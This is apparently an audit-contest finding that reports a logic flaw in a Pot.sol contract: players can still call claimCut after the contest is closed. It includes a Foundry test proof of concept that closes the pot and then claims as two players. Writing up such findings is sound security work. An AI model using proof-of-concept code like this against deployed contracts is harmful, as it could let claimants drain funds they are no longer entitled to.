Submission Details
Severity:
After close the Contest, the player still can call the claimCut which is not exactly the project is expecting.
Summary
After close the Contest, the player still can call the claimCut which is not exactly the project is expecting.
Vulnerability Details
in Pot.sol, the player still can call the claimCut even the pot is closed by the owner. This situation is Not the project owner expected.
POC
function testClosePotThenclaim() public mintAndApproveTokens {
vm.startPrank(user);
contest = ContestManager(conMan).createContest(players, rewards, IERC20(ERC20Mock(weth)), 15);
ContestManager(conMan).fundContest(0);
vm.stopPrank();
// totalContests = ContestManager(conMan).getContests();
uint256 balanceBefore = ERC20Mock(weth).balanceOf(contest);
console.log("The contest Before balance is: ", balanceBefore);
vm.warp(91 days);
// execut closePot
vm.startPrank(user);
ContestManager(conMan).closeContest(contest);
vm.stopPrank();
vm.startPrank(user);
ContestManager(conMan).reFund(ERC20Mock(weth));
vm.stopPrank();
// still can claimCut
vm.startPrank(player1);
Pot(contest).claimCut();
vm.stopPrank();
vm.startPrank(player2);
Pot(contest).claimCut();
vm.stopPrank();
}
Impact
Tools Used
manual
Recommendations
If the Pot was closed, there are not allow the user to claimCut any more.
Rewards breakdown
nSLOC
106This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.